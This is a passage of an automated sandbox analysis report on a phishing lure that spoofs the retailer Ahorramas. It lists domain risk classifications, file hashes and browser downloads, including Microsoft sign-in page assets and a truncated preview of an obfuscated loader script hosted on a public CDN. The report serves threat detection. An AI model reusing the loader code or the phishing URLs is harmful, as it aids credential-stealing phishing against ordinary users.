                                      ]
                                    }
                                    ```
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
                                    {
                                      "legit_domain": "ahorramas.com",
                                      "classification": "known",
                                      "reasons": [
                                        "The brand 'AhorrasMas' is a known brand, likely associated with the domain 'ahorramas.com'.",
                                        "The provided URL 'tdmmv2467vengtbhl3e.citq.de' does not match the legitimate domain for AhorrasMas.",
                                        "The URL contains a random string and a different domain extension '.de', which is not typically associated with AhorrasMas.",
                                        "The presence of a subdomain with random characters is a common tactic used in phishing attempts.",
                                        "The input fields labeled as 'unknown' suggest a lack of clear purpose, which is suspicious."
                                      ],
                                      "riskscore": 9
                                    }
                                    ```
                                    Google indexed: False
                                    URL: tdmmv2467vengtbhl3e.citq.de
                                                Brands: AhorrasMas
                                                Input Fields: u, n, k, n, o, w, n
                                    URL: https://ahorramas-5ocglii6fvrlmr.wroy.de Model: Joe Sandbox AI
                                    {
                                        "typosquatting": true,
                                        "unusual_query_string": false,
                                        "suspicious_tld": true,
                                        "ip_in_url": false,
                                        "long_subdomain": true,
                                        "malicious_keywords": false,
                                        "encoded_characters": false,
                                        "redirection": false,
                                        "contains_email_address": false,
                                        "known_domain": false,
                                        "brand_spoofing_attempt": true,
                                        "third_party_hosting": true
                                    }
                                    URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
                                    URL: https://wroy.de Model: Joe Sandbox AI
                                    {
                                        "typosquatting": false,
                                        "unusual_query_string": false,
                                        "suspicious_tld": false,
                                        "ip_in_url": false,
                                        "long_subdomain": false,
                                        "malicious_keywords": false,
                                        "encoded_characters": false,
                                        "redirection": false,
                                        "contains_email_address": false,
                                        "known_domain": false,
                                        "brand_spoofing_attempt": false,
                                        "third_party_hosting": false
                                    }
                                    URL: https://wroy.de
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):338
                                    Entropy (8bit):3.4535923149457752
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8D162B02FFDA8D8642A0859FBBCAAE1F
                                    SHA1:6601F0BAB93AFAD613FCEE940F94E834A48EA5D2
                                    SHA-256:4ED92E3E335B7E3356346672650FEDC182CC7B271BFA22774DACA817A2ADA2B1
                                    SHA-512:A07A880C5A27A20C2A4A5BD3AE2A09F0CCC469F03B34F5202F0B296F66D2C4D31C1FEFFFB2E8213623B3D7EDFD624517B0C1EDAE1DC6FF11E610E33BD096E88D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:p...... ........E..7E7..(..................................................^SZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):231348
                                    Entropy (8bit):4.385181381343066
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:1E53810E06C6DEB9DCD945BB7E687231
                                    SHA1:DBB0973AD1F8A15EF0D6729EB33AAEEA9964C8CC
                                    SHA-256:60C542FC33E375DE053E3AB02055CDF7466CB769E432144BA709D3CBA7C46A0D
                                    SHA-512:95124D0A7C7EA6231439CD06A04BAE50B6F568C0735125B5B7049C669225F6CC66752F40E3A1FBFD5F8931000553623618779C2C2AE4A8662EFBB333F086385D
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):180288
                                    Entropy (8bit):5.290995299950785
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8707E8AB51FD378997188DE42F158B47
                                    SHA1:2C5EBBC2F796C35F45145F06211D01DBCF099321
                                    SHA-256:9002CF909D7559DFFF2DC17A83F795FCA5392D68CE1F8DCDB0C8379CF81B93D2
                                    SHA-512:F9DEDE4440C922E691669AB5BB47D5B90F0E27A821C9BEBF53062AF34B16C40D47654430A23EAB4BAB5D9B681C3558A7E815F3D93C29B3FE8C9E7CD5D6629EFD
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-15T10:00:34">.. Build: 16.0.18223.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:SQLite Rollback Journal
                                    Category:dropped
                                    Size (bytes):4616
                                    Entropy (8bit):0.13760166725504608
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B48807C3065F5F541F96A460A9D25B07
                                    SHA1:A6C6536CD3608F1481500CE26830E76779F5FAE4
                                    SHA-256:1EBD2312D7380D00A38BE0114A63119032F106F0C507ACB158428B0EE8BF4527
                                    SHA-512:C8B83573BE99827190B268F61403EE4BF0AF25E8F89809A2B06414BF6BA3560326F86D847322DACDF5FDB930F8C03815D50F424F011813E549CE7DE79BD69016
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):1.2389205950315936
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:3C67B369BC979AF6F44281C10D0ABB0F
                                    SHA1:C97C9BAED90B5576976D4E63668A390B3B02A53E
                                    SHA-256:836CEBAA2E9EF3BD21EBD93495C3F0FB494231551ED1290519F122AAD99C7FCE
                                    SHA-512:08C57553B2E662EB2DF5306E16D880E10B490F2455EDC60B96CA4DE9F12F655135835B0E008D5DB4115F2961058006F5607050D12D2752D95AD9D889F4B4B5FB
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2673
                                    Entropy (8bit):3.9759771744945693
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A1BD029E680689CA67C5BE3749E59DC8
                                    SHA1:6C1113DBA3E0AA729E65E7F2CDDB032F84E25DD0
                                    SHA-256:E38ECBAB2FCF849F8DB344BC05BB5C30ADD3BA42629D3DBBAF56866EE789721B
                                    SHA-512:FDFB668E131555A788FCEE3C8AA929D0BB2551AC33D90608E30CD7AD73CF82D3192A7C591906037EDA920DD658421B22F61B5B99BD715E05E275DC00F840333F
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2675
                                    Entropy (8bit):3.9904427738079566
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2228DD54F24BBEC3F0CF58333F0D5789
                                    SHA1:8CCD323FC25B9B2BC667935A6620A62BEFFC6B7D
                                    SHA-256:1A985D737319AB8B1B24764C704D12F47B9EECFB923817C5084D11D3F07CEAE1
                                    SHA-512:36F92DEF1115D3CD52BC324CF581C1A3930955183D7E52F03A4AC71713F8C02FC37853933D7257692ADA6055CFB73255DF162D6098BA959D7E82380A3473150A
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2689
                                    Entropy (8bit):4.001659778384124
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9F8C8A6524C3791FA7FE353D56FC3EE7
                                    SHA1:B04E2F195092D3FDFB0B2E0D5B152031DF458B6F
                                    SHA-256:8D675A2817199E3A2FFD22732BD9E028F80193613F61F3ABCB4D039596F7F45F
                                    SHA-512:48287F927BA4870E0C2421C734E6B8B46666D2D5B75386417A79B0AA58C57146A272EC9185B3AD2C764C3AB1FB4715508D883824FCB0E00BCF8A9ED67DC1109D
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9892604617751926
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:009B36EDE61D3F70854FB8E6F23767CF
                                    SHA1:84D0A8E992C309F7D8FD2AC8D2230F961F4038AD
                                    SHA-256:E94AE0DC7FB0B53F4E765F1A4FB17077D07B23C6758A74DD51A6A22925713B39
                                    SHA-512:D208CAC3F8F24228AF561412F385F4854C95522DDE49CE79A5D8DE266D7AA885EC109719C3029E88D7B8C63F5E3DF6CFA4CAABE17FF67C05C131C7AF812C00CC
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9774876794883456
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:48CCD180DBAA3334D18C8BCE9860A08F
                                    SHA1:AE962F6E90419714C8EA1AD00C5430A9DADA8D1D
                                    SHA-256:1A59B2C4C34FE512E2D0EF97523E2692FBDBC8FBE1BCD6A4E670F2370DA4C7BA
                                    SHA-512:472D2665D606444061FF613637A50F9A3A583322C311014A21D30E0A1E3BE1EC0505A974955CF4FAA2CE0EBAEDE36CB210CBA5977FD1DCCC1A46C0D8C255638F
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):3.9850798521505872
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:87FAE11ED94BBE7F75CBE14F634D85B8
                                    SHA1:9F1F977E33CF97FB5FDBE79924E42482E2B3E82B
                                    SHA-256:E302CD80D3A9F5AA819893237D8655DB4DF686EF6F8FC0D1C248CE4B2FA4D9AA
                                    SHA-512:280C9F34D9A92A2D50B5098213A44FB35FE730D7CD757E9223BAFAE02B0CF4291F163E4F165FEAEC110A28C2F5E08C4D1336A22D945556DACED76C796A4E6D69
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.....t\=E7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 110554
                                    Category:downloaded
                                    Size (bytes):19953
                                    Entropy (8bit):7.979493872046846
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:C60D83111FACE767A068BE9B5178B887
                                    SHA1:BDBE2ED3247BB647CB318A9D0A4182E65B66473D
                                    SHA-256:62F6067588E8E74833692A1511AC8AF5B66F380E8BFC842B7EC7B2785494AEC3
                                    SHA-512:C5C424AA2AA7AB782C294512CB3666E2AB67FC152F46576531733DAD7EE4FB4CB19BCB763C126C42DD131BF7642A103ABDF0C784BA1A0D62175F400A6D9922D7
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:GIF image data, version 89a, 352 x 3
                                    Category:downloaded
                                    Size (bytes):2672
                                    Entropy (8bit):6.640973516071413
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:166DE53471265253AB3A456DEFE6DA23
                                    SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                    SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                    SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (32089)
                                    Category:downloaded
                                    Size (bytes):92629
                                    Entropy (8bit):5.303443527492463
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                    SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                    SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                    SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js
                                    Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (39816)
                                    Category:downloaded
                                    Size (bytes):85056
                                    Entropy (8bit):6.016634333105267
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A94412272433086C0A3E68D53BA53772
                                    SHA1:83A7F5BACE14151962C396A05C9A88609C49521D
                                    SHA-256:A82F9E475484D9B62B25D738FD679C6BED73C33F337E21D279ABCEC436D6EFE0
                                    SHA-512:8826B22C32FF7BA442B9A463A34EEFB750D7458B55D9C84EA56D5927156B92CC354156989025151AE95AE789B817CAD15E9F814D64EC02B6F82773B1AB115219
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdn.jsdelivr.net/gh/mecolo123/coke-load@main/loader.js
                                    Preview: var _0x2977b4=_0x29d5;(function(_0x4dafec,_0x41cf74){var _0x370aa7=_0x29d5,_0x3a0ae3=_0x4dafec();while(!![]){try{var _0x4df948=-parseInt(_0x370aa7(0x90))/0x1*(-parseInt(_0x370aa7(0x8c))/0x2)+-parseInt(_0x370aa7(0x101))/0x3+-parseInt(_0x370aa7(0xd2))/0x4*(-parseInt(_0x370aa7(0x10f))/0x5)+-parseInt(_0x370aa7(0xee))/0x6+-parseInt(_0x370aa7(0x7b))/0x7*(-parseInt(_0x370aa7(0x83))/0x8)+parseInt(_0x370aa7(0xb3))/0x9+-parseInt(_0x370aa7(0xef))/0xa*(-parseInt(_0x370aa7(0xb7))/0xb);if(_0x4df948===_0x41cf74)break;else _0x3a0ae3['push'](_0x3a0ae3['shift']());}catch(_0x282d88){_0x3a0ae3['push'](_0x3a0ae3['shift']());}}}(_0x312b,0x79be7));let waitingForApproval=![];function checkImage(_0x5328d1){var _0x1dc8ef=_0x29d5,_0x5a34ee=new Image();_0x5a34ee['onload']=function(){var _0x537c50=_0x29d5;this[_0x537c50(0xe1)]>0x0&&(document[_0x537c50(0xec)](_0x537c50(0x99))[_0x537c50(0x11d)]=_0x5328d1);},_0x5a34ee[_0x1dc8ef(0xfe)]=function(){var _0x3af3d3=_0x1dc8ef;let _0x12f0d8=_0x5328d1['replace'](/bannerlogo/
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):40
                                    Entropy (8bit):4.408694969562841
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9A35752B00B475538FFBF92F07A1850A
                                    SHA1:319B8FA8615BE892F71A0091116A6AC100D81A11
                                    SHA-256:275EA375F4F575933CE4E55C767EB9FD75E09EA024C4216B84AF135469EC802B
                                    SHA-512:74E4FB32A9FEC0ABC49EBF9DF612C9F91887C9CC17DCA8E28BC43D4A44A16C9BBDBFF222312A46956CBE70E0D19D92D8F5C0E11222C62519F71B7D2C48583E7D
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHglsLwNBX3ZhwhIFDXHV-V0SBQ3TlrvUEgUNla-N_Q==?alt=proto
                                    Preview:ChsKBw1x1fldGgAKBw3TlrvUGgAKBw2Vr439GgA=
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (47671)
                                    Category:downloaded
                                    Size (bytes):47672
                                    Entropy (8bit):5.401921124762015
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B804BCD42117B1BBE45326212AF85105
                                    SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                    SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                    SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):3651
                                    Entropy (8bit):4.094801914706141
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                    Category:downloaded
                                    Size (bytes):276
                                    Entropy (8bit):7.316609873335077
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                    SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                    SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                    SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):36
                                    Entropy (8bit):3.7080030435786817
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:658C9286407AEEE268BA52E45DA2252A
                                    SHA1:18591157B79780B4EDF9B66AF042581FA5A36756
                                    SHA-256:394C095C2710C6A131C27FB7E00ADA38EC005C86B512403062ED81C33F6B51F0
                                    SHA-512:778515AFE1750B95F5BC6F7C3E42A6DF9B45F4C42431462A348B1E27275EF786E9CDFB36BDCCD9C84AEC4AC05AD60AE2024CC1D2E19C96900C5C9E7E03FFCF30
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ahorramas-5ocglii6fvrlmr.wroy.de/favicon.ico
                                    Preview:Something went wrong try again later
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (425)
                                    Category:dropped
                                    Size (bytes):740
                                    Entropy (8bit):5.259182063956321
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:852B139BEAE1DBFD8EB034360B43186E
                                    SHA1:D1D754ADD8708A769CBEAFFC3302A78AA9EE3A75
                                    SHA-256:D2838C08BD2E431A127ECD01E070A4396F650393B58E87F390D9BAF3FDFAD523
                                    SHA-512:514B8E8BBB6075E8B0434B3B1366505D140BDE59D49DA35DE85C85EF22E58ABBEDEA50CD777F3851817D5A38605E4B776FB5FD53545E27866DA72906C0F5317A
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:/**/ console &&console.log &&console.log({"ip":"173.254.250.89","hostname":"173.254.250.89.static.quadranet.com","city":"Dallas","region":"Texas","country":"US","loc":"32.8152,-96.8703","org":"AS8100 QuadraNet Enterprises LLC","postal":"75247","timezone":"America/Chicago","readme":"https://ipinfo.io/missingauth"}); typeof jQuery19102506766626065473_1731664874565 === 'function' && jQuery19102506766626065473_1731664874565({. "ip": "173.254.250.89",. "hostname": "173.254.250.89.static.quadranet.com",. "city": "Dallas",. "region": "Texas",. "country": "US",. "loc": "32.8152,-96.8703",. "org": "AS8100 QuadraNet Enterprises LLC",. "postal": "75247",. "timezone": "America/Chicago",. "readme": "https://ipinfo.io/missingauth".});
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8168), with no line terminators
                                    Category:dropped
                                    Size (bytes):8168
                                    Entropy (8bit):5.764521099141343
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E568483731EF5BAB18B34A4EDD939306
                                    SHA1:FBB4629FE2E27130724F9B3BA0947FD35A05E900
                                    SHA-256:49F6CF2DF488B4A87D4D66C222722F4C14B803D9F155DD8994DD73CC9FBE3A27
                                    SHA-512:4877E518B91B02E19A27D7AA4994930B3CA231A4AE7B1A4A05899AFC9E167D5DB5B71F58C57A48B91DD9C7EC02B79DD94000F0B7E62F9A442C510C3D1A85F118
                                    Malicious:false
                                    Reputation:unknown
